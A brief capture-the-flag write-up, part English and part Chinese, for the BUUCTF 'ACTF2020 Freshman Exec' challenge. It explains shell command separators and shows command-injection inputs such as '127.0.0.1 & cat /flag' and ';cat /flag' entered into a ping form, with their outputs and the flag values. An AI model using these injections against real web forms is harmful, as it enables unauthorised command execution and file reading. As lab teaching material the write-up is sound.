【BUUCTF】[ACTF2020 Freshman Competition]Exec Writeup

0x00 knowledge points

• No filtering, 管道符execute with common commands

1、|（就是按位或），直接执行|后面的语句

2、||（就是逻辑或），如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句

3、&（就是按位与），&前面和后面命令都要执行，无论前面真假

4、&&（就是逻辑与），如果前面为假，后面的命令也不执行，如果前面为真则执行两条命令

5、; 前后都执行，无论前面真假，同&，（linux也有）

0x01 problem solving

127.0.0.1|ls

index.php

• It takes a long time to find the flag from the root directory

127.0.0.1 | find / -name flag

/flag

127.0.0.1 & cat /flag

Mark {38aee01b-d1a6-4fcb-93f1-dbf86ef25fd8}
PING 127.0.0.1 (127.0.0.1): 56 data bytes

|cat /flag

;cat /flag

Mark {f40182a0-6749-43f2-b223-9651bf2ef2d0}